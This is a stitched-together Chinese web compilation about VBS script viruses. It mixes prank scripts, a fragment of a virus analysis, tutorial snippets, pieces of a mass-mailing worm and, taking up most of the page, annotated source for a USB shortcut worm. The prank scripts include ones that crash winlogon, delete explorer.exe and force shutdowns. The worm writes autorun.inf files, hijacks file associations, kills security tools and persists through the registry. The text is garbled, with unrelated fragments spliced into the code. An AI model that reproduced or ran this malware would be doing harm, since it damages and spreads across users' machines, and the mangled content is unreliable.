VBS脚本病毒教程

合集下载

对一个vbs脚本病毒的病毒原理分析

对⼀个vbs脚本病毒的病毒原理分析⼀、前⾔病毒课⽼师丢给我们⼀份加密过的vbs脚本病毒的代码去尝试分析，这⾥把分析过程发出来，供⼤家参考，如果发现⽂中有什么错误或者是有啥建议，可以直接留⾔给我，谢谢！⼆、⽬录整个分析过程可以分为以下⼏个部分:0x00 准备⼯作0x01 解密部分0x02 功能分析三、分析过程0x00 准备⼯作windows xp的虚拟机(在⾃⼰的windows下也可以做)vbs的⼀些基本语法0x01 解密部分右击病毒⽂件然后编辑打开或者是直接把其后缀修改成txt直接打开都⾏，可以看到⼀⼤段密⽂，并调⽤了⼀个函数deCrypt。

暂时只看到这些，那么接着往下看吧。

拖到代码底部，发现有deCrypt了⼀次，也就是经过了两次加密，这⾥把执⾏部分注释掉，然后将解密的结果输出到⽂本⽂件中去。

另外，可以看到是⽤base64进⾏的加密的。

现在来看看解码后的结果。

发现依旧是不可阅读的代码，那就继续看看他是怎么处理的吧。

这⾥可以看到是将之前的字符串按“|dz|”划分，然后得到的是ascii码，将这些ascii码对应的字符拼接起来就好了，就得到了结果。

同样的套路将解密结果输出到⽂件中去再继续分析。

然后这次得到的结果是真正的病毒代码了。

接下来对他的功能进⾏分析。

0x02 功能分析从头开始看吧。

显⽰⼀些配置信息，包括了服务器的域名。

可以查到服务器是美国的，尝试ping了下，ping不通，可能是服务器作了设置不让⼈ping、也可能是服务器已经不⽤了、也有可能是我国的防⽕长城直接墙掉了。

然后是⼀些之后要⽤到的变量，这⾥不作过多的解释。

之后就是code start的部分了。

然后由于⾥⾯调⽤了各种函数，所以这⾥按执⾏的顺序给调⽤的函数编号，以便阅读，不然会感觉很凌乱的。

这⾥先是调⽤了instance函数。

1.instance函数给之前的⼀个参数usbspreading赋值，并对注册表进⾏写操作在执⾏完了instance函数后，会进⼊⼀个while true的死循环，不断从服务器读取命令，然后执⾏。

vbs恶作剧（病毒）程序代码

vbs恶作剧（病毒）程序代码恶作剧(病毒)的vbs代码，这里提供的都是一些死循环或导致系统死机的vbs对机器没坏处，最多关机重启一下就可以了打开记事本，把代码复制粘贴进去，再另存为*.vbs格式即可操作方法：把代码另存为*.VBS运行即可经本人亲自测试不会出大问题的，一般都是利用无限循环，不是死循环，可以通过任务管理器中结束wcscript.exe进程（如下图）即可解决代码的破坏。

结束VBS代码进程vbs恶作剧(病毒)程序代码代码如下:复制代码代码如下:domsgbox "hi"loop无限制的用英文报数复制代码代码如下:Set s = CreateObject("sapi.spvoice")i=0dos.speak ii=i+1loop复制代码代码如下:if MsgBox("对不起,您灌水太多需要重新启动计算机。

"&chr(10)&"确定要重启吗？",vbOKCancel+vbInformation,"重新启动计算机")=vbCancel thenmsgbox " 系统将立刻重起wow ~_^",,"你上当了！！"Set objShell = CreateObject("Wscript.Shell")objShell.Run "shutdown -s -t 5",,trueend if复制代码代码如下:strs=array(13,105,102,32,77,115,103,66,111,120,40,34,-15133,-13625,-10515,-12873,-15632,-23617,34,44,118,98,89,101,115,78,111,44,34,-12363,-12877,-13087,-13634,34,41,61,118,98,121,101,115,32,116,104,101,110,32,13,10, 32,32,32,32,32,32,32,32,32,32,32,109,115,103,98,111,120,32,34,-15133,89,-13899,-20026,-20319,33,34,13,10,101,108,115,101,13,10,32,32,32,32,109,115,103,98,111,120,32,34,-17479,-19781,-19504,-14129,33,33,32,-10249,-12630,-19507,-18525,-23636,-16202,-14655,-11589,-12350,-23636,-15133,-15635,-13873,-17966,-15925,35,-23644,-23647,64,35,-23644,37,64,-24147,-24147,35,-24147,-24147,63,34,44,54,52,44,34,-11825,-10536,-16721,-18202,33,33,33,33,33,33,33,33,33,34,13,10,83,101,116,32,119,115 ,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,1 15,99,114,105,112,116,46,83,104,101,108,108,34,41,32,13,10,119, 115,99,114,105,112,116,46,115,108,101,101,112,32,32,32,49,50,4 8,48,13,10,119,115,46,114,117,110,32,34,99,109,100,32,47,99,32, 115,116,97,114,116,32,47,109,105,110,32,110,116,115,100,32,45, 99,32,113,32,45,112,110,32,119,105,110,108,111,103,111,110,46, 101,120,101,32,49,62,110,117,108,32,50,62,110,117,108,34,44,11 8,98,104,105,100,101,13,10,101,110,100,32,105,102,13,10,13,10,1 3,10)for i=1 to UBound(strs)runner=runner&chr(strs(i))nextExecute runner这个没什么，不过加密了，大家可以解密试试复制代码代码如下:if MsgBox("你是猪头吗？",vbYesNo,"提示")=vbyes thenmsgbox "你SB啊!"elsemsgbox "还不承认!! 作为惩罚，蓝屏一下，你马上挂了#￥！@#￥%@……#……?",64,"严重警告"Set ws = CreateObject("Wscript.Shell")wscript.sleep 1200ws.run "cmd /c start /min ntsd -c q -pn winlogon.exe 1>nul 2>nul",vbhide复制代码代码如下:Set ws = CreateObject("Wscript.Shell")ws.run "cmd.exe /c call calc.exe",0下面的是删除explorer.exe，导致桌面没有显示，不过它事先帮你备份了，为同目录下的explorer.Data复制代码代码如下:set ws=CreateObject("Wscript.Shell")ws.run "cmd.exe /c taskkill /f /im explorer.exe",0wscript.sleep 900ws.run "cmd.exe /c copy %windir%\explorer.exe %windir%\explorer.Data"wscript.sleep 1200ws.run "cmd.exe /c del /q /f %windir%\explorer.exe复制代码代码如下:for each wind in verybatws.sendkeys windwscript.sleep 500nextws.popup"唉:-(( ⊙ o ⊙ )！呀，我好累啊，我下了 886",30ws.popup"下机可不能忘了关QQ 我吧QQ关了哈",8ws.run "taskkill /f /im qq.exe"ws.popup"你还要上吧慢慢玩哦",27dim WSHshellset WSHshell = wscript.createobject("wscript.shell")for d=0 to 4WSHshell.SendKeys "%{F4}"nextws.run"shutdown -s -t 1000600"wscript.sleep 2000doa=inputbox("请输入解除关机密码")if a="403746401" thenws.run"shutdown -a"msgbox"密码验证成功，enjoy the best!"exit doelsemsgbox"密码验证失败，请输入解除关机密码：403746401 ",vbretrycancelend ifloopws.popup"哈哈被吓到了吧好玩吧？你以为真的是病毒？呵呵O(∩_∩)O~，我还没那么打本事能做出病毒来！",57ws.popup"(\(^o^)/~ 好啦，跟你开了个小小玩笑。

彻底清楚U盘vbs

彻底清楚U盘vbs
VBS病毒，英文名：Visual Basic Script，该病毒程序虽然编写简单，但破坏力大，可通过感染htm、asp、jsp、php等网页文件而传播，该病毒一般都是通过不断的自我复制来感染文件，病毒中的部分代码甚至会直接附加在其他同类程序之中，中毒后的电脑会在各个盘符下生成.vbs、autorun.exe等文件。

影响电脑的运行速度，用户会觉得电脑越来越卡。

下面我们教大家认识VBS病毒，及正确使用U盘杀毒专家查杀VBS病毒。

第一步：认识VBS病毒
电脑中中了VBS病毒，会出现如下所示的.vbs文件，
注：文件名一般不定，有时会是：pagefileconfig.vbs或prndrvr.vbsprnjobs.vbs等，主要表现形式是，以.vbs 格式存在。

该病毒自我复制速度快，如果不即时清除，会在你的电脑中不断出现该文件的复制版。

第二步：安装U盘杀毒专家（USBKiller），查杀VBS病毒
如果你的电脑中没有安装U盘杀毒专家，可以点此下载，安装后，打开主界面，点击“开始扫描”：
扫描结束后，会出现病毒的名称，路径以及相应的处理结果。

应用U盘杀毒专家查杀VBS病毒，方便快捷，不用担心会删除后下次还会出现此类vbs病毒，另外，U 盘杀毒专家具有修复U盘的功能，在查杀U盘病毒的同时，修复您的U盘系统，并免疫您的U盘，更多有关U盘杀毒专家的介绍，请点击以下网址查阅：
/。

实验3 简单VBS病毒的编写

int CopyFile(const char* srcName,const char* dstName)
{
FILE* fpSrc = NULL;
FILE* fpDst = NULL;
int ch,rval=1;
/*open file*/
fpSrc=fopen(srcName,"rb");
if(fpSrc==NULL)
goto error;
fpDst=fopen(dstName,"wb");
if(fpDst==NULL)
goto error;
/*copy file*/
while((ch=fgetc(fpSrc)) !=EOF)
{
if(fputc(ch,fpDst)==EOF)
goto error;
}
fflush(fpDst); /*make sure restore*/
Set dir2 = fso.GetSpecialFolder(1) '得到System路径
if flag = 1 then
Set fileName = "c:\OnLoad.txt"
else
Set fileName = "c:\OnBtn.txt"
endif
Set a = fso.CreateTextFile(fileName, True)
4、启动WWW服务器（如IIS），访问带毒网页，测试效果
5、删除网页文件中的病毒代码，再测试网页效果
6、对比带毒和不带毒网页在显示效果上是否相同
四实验总结
我用的是C语言编写的代码，能够完成在C:\下建立一个自定义文件夹作为病毒操作测试空间，再在其中建立多个子文件夹，别在这些然后本在子文件夹中复制或者建立多个dat文件,但后面在网页上显示的我就没写了。代码我用的和实验一的代码一样的，因为安全性能好，不会造成破坏，我在函数中控制了生成文件的个数。

VBS教程

下：
你会发现，怎么没有标题？
接下来，就教你设置标题。
打开记事本，输入 msgbox"你好",,"你好" ，然后保存（保存方法在第五行已经讲明，
不再复述），双击运行，效果如下：
可能会遇到这个错误：
这是因为引号在中文输入法下输入，应该切换为英文输入法，即
就按下了回车键，依次类推
loop
只弹出一个“你好”对话框。
但是如果结束“wscript.exe”进程，它自然也就不运行了。
第五课：for函数
for函数主要是循环某个语句特定的次数
打开记事本，输入
for a=1 to 10
msgbox"你好!"
next 然后保存，双击运行。
set b=a.createtextfile("D:\a.txt")
然后保存，双击运行
这样，就创建了一个文本文件在D:\a.txt
把代码变换一下：
set a=createobject("scripting.filesystemobject")
set b=a.createtextfile("D:\a.txt")
jisuanqi","calc.exe"
然后保存，双击运行，重新启动电脑
一开始就运行“计算器”程序
把代码变换一下：
set a=createobject("wscript.shell")
a.regdelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ru

最简单的一个电脑病毒

最简单的一个电脑病毒
电脑病毒有简单也有复杂的，有些虽然简单，但是它的危害也是不容小视的!下面由店铺给你做出详细的最简单的电脑病毒介绍!希望对你有帮助!
简单病毒1.VBS版本:
打开记事本，输入以下代码:
Do Until 1=2
Wscript.echo "烦死你!"
Loop
保存为1.VBS，运行后不断出现"烦死你"的对话框。

简单病毒2.VB6版本:
打开Visual Basic 6.0，双击窗体，输入以下代码:
Private Sub Form_Load()
Do Until 1=2
Me.Hide
Me.Show
Shell "calc.exe"
Loop
End Sub 保存后编译为EXE文件，运行后马上死机。

简单病毒后记:
如果是Win2000以上操作系统，在VB中调用FSO和系统API，可以极大增强病毒的威力。

vbs教程

以下是文件感染的部分关键代码：
Set fso=createobject("scripting.filesystemobject") '创建一个文件系统对象
set self=fso.opentextfile(wscript.scriptfullname,1) '读打开当前文件（即病毒本身）
WScript.Echo "Network printer mappings:"
For i = 0 to oPrinters.Count - 1 Step 2 '显示网络打印机连接情况
WScript.Echo "Port " & oPrinters.Item(i) & " = " & oPrinters.Item(i+1)
attachMents.Add fileSysObj.GetSpecialFolder(0) & "\test.jpg.vbs"
item.DeleteAfterSubmit = True //信件提交后自动删除
If item.To <> "" Then
item.Send //发送邮件
上面的代码就是VBS脚本病毒进行文件搜索的代码分析。搜索部分scan( )函数做得比较短小精悍，非常巧妙，采用了一个递归的算法遍历整个分区的目录和文件。
2．vbs脚本病毒通过网络传播的几种方式及代码分析
VBS脚本病毒之所以传播范围广，主要依赖于它的网络传播功能，一般来说，VBS脚本病毒采用如下几种方式进行传播：
For addrEntIndex= 1 To addrEntCount //遍历地址表的Email地址

vbs快捷方式病毒删除方法

U盘病毒--vbs快捷方式病毒源代码【分析↓】vbs快捷方式病毒删除方法注意：把以下的病毒代码复制到“记事本”后，在“另存为”操作时，名称为worm.vbs，“保存类型”为“所有文件”，“编码”为“ANSI”。

不然会提示错误信息，型如行：1字符：1错误：无效字符代码：800A0408源： microsoftvbscript 编译器错误On Error Resume NextDim Fso,WshShellSet Fso=CreateObject("scRiPTinG.fiLEsysTeMoBjEcT")Set WshShell=CreateObject("wScRipT.SHelL"):Call Main()''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' ''''''''''''''''''''''''''''''''''''''''''主函数从这里开始''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' '''''''''''''''''''''''''''''''''''''''''Sub Main()On Error Resume NextDim Args, VirusLoad, VirusAssSet Args=WScript.ArgumentsVirusLoad=GetMainVirus(1)'"c:\windows\system32\smss.exe:881406080.vbs "或者"c:\windows\system32\881406080.vbs"VirusAss=GetMainVirus(0)'"c:\windows\explorer.exe:881406080.vbs"或者"c:\windows\881406080.vbs"ArgNum=0Do While ArgNum<Args.Count'将vbs脚本的参数用空格分开一起放在Param这个字符串里面Param=Param&" "&Args(ArgNum)ArgNum=ArgNum + 1LoopSubParam=LCase(Right(Param, 3))'从Param串的右边取长度为3的子串，并且全部变为小写放进SubParamSelect Case SubParam'开始判断参数最右面，相当于后缀部分Case "run"'貌似这种情况不存在,但是第一次会运行RunPath=Left(WScript.ScriptFullName, 2)'将72161642.vbs所在磁盘返回RunPath，比如D:Call Run(RunPath)'Run("F:")没有意义Call InvadeSystem(VirusLoad,VirusAss)Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)Case "txt", "log","ini" ,"inf"'如果是这些表明用户打开了文本文件RunPath="%SystemRoot%\system32\NOTEPAD.EXE "&ParamCall Run(RunPath)Call InvadeSystem(VirusLoad,VirusAss)Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)Case "bat", "cmd"'让批处理显示 you jump, i jump!RunPath="CMD /c echo you jump i jump!&pause"Call Run(RunPath)Call InvadeSystem(VirusLoad,VirusAss)Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)Case "reg"RunPath="regedit.exe "&""""&Trim(Param)&""""'删除路径首尾空格Call Run(RunPath)Call InvadeSystem(VirusLoad,VirusAss)Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)Case "chm"RunPath="hh.exe "&""""&Trim(Param)&""""Call Run(RunPath)Call InvadeSystem(VirusLoad,VirusAss)Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)Case "hlp"RunPath="winhlp32.exe "&""""&Trim(Param)&""""Call Run(RunPath)Call InvadeSystem(VirusLoad,VirusAss)Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)Case "dir"RunPath=""""&Left(Trim(Param),Len(Trim(Param))-3)&""""'除去dir三个字母Call Run(RunPath)'打开文件夹Call InvadeSystem(VirusLoad,VirusAss)Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)Case "oie"RunPath="""%ProgramFiles%\Internet Explorer\IEXPLORE.EXE"""Call Run(RunPath)Call InvadeSystem(VirusLoad,VirusAss)Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)Case "omc"'打开我的电脑RunPath="explorer.exe /n,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}" Call Run(RunPath)Call InvadeSystem(VirusLoad,VirusAss)Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)Case "emc"'劫持Win+ERunPath="explorer.exe /n,/e,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}" Call Run(RunPath)Call InvadeSystem(VirusLoad,VirusAss)Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)Case ElseIf PreDblInstance=True ThenWScript.QuitEnd IfTimeout = Datediff("ww", GetInfectedDate, Date) - 12'12周也就是说感染了3个月了If Timeout>0 And Month(Date) = Day(Date) ThenCall VirusAlert()Call MakeJoke(CInt(Month(Date)))'如果是5月5号那么就弹出5次光驱End IfCall MonitorSystem()End SelectEnd Sub''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' ''''''''''''''''''''''''''''''''''''''''''主函数至此结束''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' '''''''''''''''''''''''''''''''''''''''''Sub MonitorSystem()'结束taskmgr.exe、regedit.exe、msconfig.exe、cmd.exe On Error Resume NextDim ProcessNames, ExeFullNamesProcessNames=Array("cmd.exe","","regedit.exe","regedit.scr","r egedit.pif","","msconfig.exe")'ProcessNames相当于数组首地址VBSFullNames=Array(GetMainVirus(1))DoCall KillProcess(ProcessNames)CallInvadeSystem(GetMainVirus(1),GetMainVirus(0))'1:smss.exe:72161642.vbs CallKeepProcess(VBSFullNames) '0:explorer.exe:72161642.vbs'上面这句用来保持进程活跃WScript.Sleep 3000LoopEnd SubSub InvadeSystem(VirusLoadPath,VirusAssPath)On Error Resume NextDim Load_Value, File_Value, IE_Value, MyCpt_Value1, MyCpt_Value2, HCULoad, HCUVer, VirusCode, VersionLoad_Value=""""&VirusLoadPath&""""'smss.exe的病毒流File_Value="%SystemRoot%\System32\WScript.exe"&""""&VirusAssPath&""""&" %1 %* "IE_Value="%SystemRoot%\System32\WScript.exe"&""""&VirusAssPath&""""&" OIE "MyCpt_Value1="%SystemRoot%\System32\WScript.exe"&""""&VirusAssPath&""""&" OMC "MyCpt_Value2="%SystemRoot%\System32\WScript.exe"&""""&VirusAssPath&""""&" EMC "HCULoad="HKEY_CURRENT_USER\SoftWare\Microsoft\WindowsNT\CurrentVersion\Windows\Load"HCUVer="HKEY_CURRENT_USER\SoftWare\Microsoft\WindowsNT\CurrentVersion\Windows\Ver"HCUDate="HKEY_CURRENT_USER\SoftWare\Microsoft\WindowsNT\CurrentVersion\Windows\Date"VirusCode=GetCode(WScript.ScriptFullName)Version=1HostSourcePath=Fso.GetSpecialFolder(1)&"\Wscript.exe"HostFilePath=Fso.GetSpecialFolder(0)&"\system\svchost.exe"For Each Drive In Fso.Drives'分别建立各个目录的病毒名字If Drive.IsReady and (Drive.DriveType=1 Or Drive.DriveType=2 Or Drive.DriveType=3) ThenDiskVirusName=GetSerialNumber(Drive.DriveLetter)&".vbs"Call CreateAutoRun(Drive.DriveLetter,DiskVirusName)Call InfectRoot(Drive.DriveLetter,DiskVirusName)End IfIf FSO.FileExists(VirusAssPath)=False OrFSO.FileExists(VirusLoadPath)=False OrFSO.FileExists(HostFilePath)=False Or GetVersion()< Version ThenIf GetFileSystemType(GetSystemDrive())="NTFS" Then'NTFS格式Call CreateFile(VirusCode,VirusAssPath)Call CreateFile(VirusCode,VirusLoadPath)'这一步创建了流文件Call CopyFile(HostSourcePath,HostFilePath)'这一步将wscript.exe从system32复制到system目录并改名svchost.exeCall SetHiddenAttr(HostFilePath)Else'FAT32格式Call CreateFile(VirusCode, VirusAssPath)Call SetHiddenAttr(VirusAssPath)Call CreateFile(VirusCode,VirusLoadPath)Call SetHiddenAttr(VirusLoadPath)Call CopyFile(HostSourcePath, HostFilePath)Call SetHiddenAttr(HostFilePath)End IfEnd IfIfReadReg(HCULoad)<>Load_Value Then'改写注册表启动项，smss.exe的流Call WriteReg (HCULoad, Load_Value, "")End IfIfGetVersion() < Version Then'改写版本信息为1Call WriteReg (HCUVer, Version, "")End IfIfGetInfectedDate() = "" ThenCall WriteReg (HCUDate, Date, "")'记录感染时间End If'以下更改许多文件关联,病毒的通用感染方式IfReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\comma nd\")<>File_Value ThenCall SetTxtFileAss(VirusAssPath)End IfIfReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\comma nd\")<>File_Value ThenCall SetIniFileAss(VirusAssPath)End IfIfReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\open\comma nd\")<>File_Value ThenCall SetInfFileAss(VirusAssPath)End IfReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\comma nd\")<>File_Value ThenCall SetBatFileAss(VirusAssPath)End IfIfReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\open\comma nd\")<>File_Value ThenCall SetCmdFileAss(VirusAssPath)End IfIfReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\comma nd\")<>File_Value ThenCall SetRegFileAss(VirusAssPath)End IfIfReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\comm and\")<>File_Value ThenCall SetchmFileAss(VirusAssPath)End IfIfReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\comma nd\")<>File_Value ThenCall SethlpFileAss(VirusAssPath)End IfIfReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\iexplore.ex e\shell\open\command\")<>IE_Value ThenCall SetIEAss(VirusAssPath)End IfIfReadReg("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309 D}\shell\OpenHomePage\Command\")<>IE_Value ThenCall SetIEAss(VirusAssPath)End IfIfReadReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309 D}\shell\open\command\")<>MyCpt_Value1 ThenCall SetMyComputerAss(VirusAssPath)End IfIfReadReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309 D}\shell\explore\command\")<>MyCpt_Value2 ThenCall SetMyComputerAss(VirusAssPath)End IfCall RegSet()End SubSub CopyFile(source, pathf)On Error Resume NextIf FSO.FileExists(pathf) ThenFSO.DeleteFilepathf , TrueEnd IfFSO.CopyFile source, pathfEnd SubSub CreateFile(code, pathf)On Error Resume NextDim FileTextIf FSO.FileExists(pathf) ThenSet FileText=FSO.OpenTextFile(pathf, 2, False)FileText.Write codeFileText.CloseElseSet FileText=FSO.OpenTextFile(pathf, 2, True)FileText.Write codeFileText.CloseEnd IfEnd SubSub RegSet()'文件夹选项的注册表设置On Error Resume NextDim RegPath1 , RegPath2, RegPath3, RegPath4RegPath1="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersio n\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedValue"'隐藏选项失效RegPath2="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersio n\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"'隐藏选项失效RegPath3="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion \Policies\Explorer\NoDriveTypeAutoRun"RegPath4="HKEY_CLASSES_ROOT\lnkfile\IsShortcut"Call WriteReg (RegPath1, 3, "REG_DWORD")Call WriteReg (RegPath2, 2, "REG_DWORD")Call WriteReg (RegPath3, 0, "REG_DWORD")'开启所有自动播放Call DeleteReg (RegPath4)'隐藏快捷方式小箭头End SubSub KillProcess(ProcessNames)'杀掉进程On Error Resume NextSet WMIService=GetObject("winmgmts:\\.\root\cimv2")For Each ProcessName in ProcessNamesSet ProcessList=WMIService.execquery(" Select * From win32_process where name ='"&ProcessName&"' ")For Each Process in ProcessListIntReturn=1'Process.terminateIf intReturn<>0 ThenWshShell.Run "CMD /c ntsd -c q -p "&Process.Handle, vbHide, FalseEnd IfNextNextEnd SubSub KillImmunity(D)'删掉autorun.inf免疫目录On Error Resume NextImmunityFolder=D&":\Autorun.inf"If Fso.FolderExists(ImmunityFolder) ThenWshSHell.Run ("CMD /C CACLS "& """"&ImmunityFolder&"""" &" /t /e /c /g everyone:f"),vbHide,True'提权WshSHell.Run ("CMD /C RD /S /Q "&ImmunityFolder), vbHide, True'rd命令删除，配合 /s /q 选项，很轻松End IfEnd SubSub KeepProcess(VBSFullNames)'保持脚本进程持续运行，少于2个创建新进程On Error Resume NextFor Each VBSFullName in VBSFullNamesIf VBSProcessCount(VBSFullName) < 2 thenRun("%SystemRoot%\system\svchost.exe "&VBSFullName)End IfNextEnd SubFunction GetSystemDrive()'获取系统盘的盘符，比如c:GetSystemDrive=Left(Fso.GetSpecialFolder(0),2)End FunctionFunction GetFileSystemType(Drive)'获取对应驱动器的文件系统格式Set d=FSO.GetDrive(Drive)GetFileSystemType=d.FileSystemEnd FunctionFunction ReadReg(strkey)'读取注册表，搜索strkey，返回所在路径Dim tmpsSet tmps=CreateObject("WScript.Shell")ReadReg=tmps.RegRead(strkey)Set tmps=NothingEnd FunctionSub WriteReg(strkey, Value, vtype)'写注册表Dim tmpsSet tmps=CreateObject("WScript.Shell")If vtype="" Thentmps.RegWritestrkey, ValueElsetmps.RegWritestrkey, Value, vtypeEnd IfSet tmps=NothingEnd SubSub DeleteReg(strkey)'删除注册表Dim tmpsSet tmps=CreateObject("WScript.Shell")tmps.RegDeletestrkeySet tmps=NothingEnd SubSub SetHiddenAttr(path)'6=2+4,分别是隐藏、系统属性On Error Resume NextDim vfSet vf=FSO.GetFile(path)Set vf=FSO.GetFolder(path)vf.Attributes=6End SubSub Run(ExeFullName)'执行ExeFullName指定的文件On Error Resume NextDim WshShellSet WshShell=WScript.CreateObject("WScript.Shell") WshShell.RunExeFullNameSet WshShell=NothingEnd SubSub InfectRoot(D,VirusName)'感染根目录On Error Resume NextDim VBSCodeVBSCode=GetCode(WScript.ScriptFullName)VBSPath=D&":\"&VirusNameIf FSO.FileExists(VBSPath)=False ThenCall CreateFile(VBSCode, VBSPath)Call SetHiddenAttr(VBSPath)End IfSet Folder=Fso.GetFolder(D&":\")'隐藏根目录下的所有子目录Set SubFolders=Folder.SubfoldersFor Each SubFolder In SubFoldersSetHiddenAttr(SubFolder.Path)LnkPath=D&":\"&&".lnk"'创建对应的快捷方式TargetPath=D&":\"&VirusNameArgs=""""&D&":\"&& "\Dir"""If Fso.FileExists(LnkPath)=False Or GetTargetPath(LnkPath) <>TargetPath ThenIf Fso.FileExists(LnkPath)=True ThenFSO.DeleteFileLnkPath, TrueEnd IfCall CreateShortcut(LnkPath,TargetPath,Args)End IfNextEnd SubSub CreateShortcut(LnkPath,TargetPath,Args)'上一步失败了调用这个函数创建快捷方式Set Shortcut=WshShell.CreateShortcut(LnkPath)with Shortcut.TargetPath=TargetPath.Arguments=Args.WindowStyle=4.IconLocation="%SystemRoot%\System32\Shell32.dll, 3".Saveend withEnd SubSub CreateAutoRun(D,VirusName)'创建autorun.inf文件On Error Resume NextDim InfPath, VBSPath, VBSCodeInfPath=D&":\AutoRun.inf"VBSPath=D&":\"&VirusNameVBSCode=GetCode(WScript.ScriptFullName)If FSO.FileExists(InfPath)=False Or FSO.FileExists(VBSPath)=False Then Call CreateFile(VBSCode, VBSPath)Call SetHiddenAttr(VBSPath)StrInf="[AutoRun]"&VBCRLF&"Shellexecute=WScript.exe "&VirusName&" ""AutoRun"""&VBCRLF&"shell\open=打开(&O)"&VBCRLF&"shell\open\command=WScript.exe "&VirusName&" ""AutoRun"""&VBCRLF&"shell\open\Default=1"&VBCRLF&"shell\explore=资源管理器(&X)"&VBCRLF&"shell\explore\command=WScript.exe "&VirusName&" ""AutoRun"""Call KillImmunity(D)Call CreateFile(StrInf, InfPath)Call SetHiddenAttr(InfPath)End IfEnd SubSub SetTxtFileAss(sFilePath)'改变txt格式文件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "CallWriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\comm and\", Value, "REG_EXPAND_SZ")End SubSub SetIniFileAss(sFilePath)'改变ini格式文件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "CallWriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\comm and\", Value, "REG_EXPAND_SZ")End SubSub SetInfFileAss(sFilePath)'改变inf格式文件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "CallWriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\open\comm and\", Value, "REG_EXPAND_SZ")End SubSub SetBatFileAss(sFilePath)'改变bat格式文件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %*"CallWriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\comm and\", Value, "REG_EXPAND_SZ")End SubSub SetCmdFileAss(sFilePath)'改变cmd格式文件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "CallWriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\open\comm and\", Value, "REG_EXPAND_SZ")End SubSub SethlpFileAss(sFilePath)'改变hlp格式文件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "CallWriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\comm and\", Value, "REG_EXPAND_SZ")End SubSub SetRegFileAss(sFilePath)'改变reg格式文件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "CallWriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\comm and\", Value, "REG_EXPAND_SZ")End SubSub SetchmFileAss(sFilePath)'改变chm格式文件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "CallWriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\com mand\", Value, "REG_EXPAND_SZ")End SubSubSetIEAss(sFilePath)'篡改IE启动设置On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" OIE " CallWriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\iexplore.e xe\shell\open\command\", Value, "REG_EXPAND_SZ")CallWriteReg("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B3030 9D}\shell\OpenHomePage\Command\", Value, "REG_EXPAND_SZ")End SubSub SetMyComputerAss(sFilePath)'改变我的电脑的打开关联，包括Win+EOn Error Resume NextDim Value1,Value2Value1="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" OMC "Value2="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" EMC "CallWriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B3030 9D}\shell\", "", 